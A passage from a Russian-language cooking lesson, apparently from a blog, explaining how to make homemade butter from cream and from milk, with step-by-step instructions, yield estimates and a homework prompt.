  • В сито выложить порции масла с пахтой. Пахте дать стечь, масло промыть охлажденной водой, отжать руками и выложить на бумажное полотенце, чтобы жидкость стекала.
  • После этого размять масло, отжать и сформировать ком.
  • Затем обернуть пленкой и отправить в холодильник.

Масло из сливок – сладковатое и нежное на вкус.

Масло из молока

Из молока как такового масло не делают, прежде из него надо выделить сливки:

  • с помощью сепаратора (специальное устройство);
  • вручную путем настаивания.

В среднем из 3 литров жирного молока можно получить до 700 мл сливок. Это будет наше исходное сырье, из которого получается 35–50 % готового продукта. То есть из 3 литров молока выйдет около 350 грамм масла.

Пошаговый процесс выглядит так:

  • Молоко пастеризовать и поставить на двое суток для поднятия сливок. С целью ускорения процесса можно воспользоваться сепаратором.
  • Взбить в маслобойке до разделения на фракции.
  • Пахту слить.
  • Масло промыть ледяной водой.
  • Воду отжать.
  • Масло размять и собрать в ком.
  • Оставить на бумажном полотенце для того, чтобы остаточная жидкость стекла.
  • Масло хранить в холодильнике.

Домашнее задание

Пришлите фото масла своего собственного производства вместе с рецептом его изготовления.

Сегодня мы научились готовить домашнее сливочное масло, узнали о тонкостях этого процесса и о том, зачем нам нужна маслобойка.

Понравилась статья? Поделиться с друзьями:
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: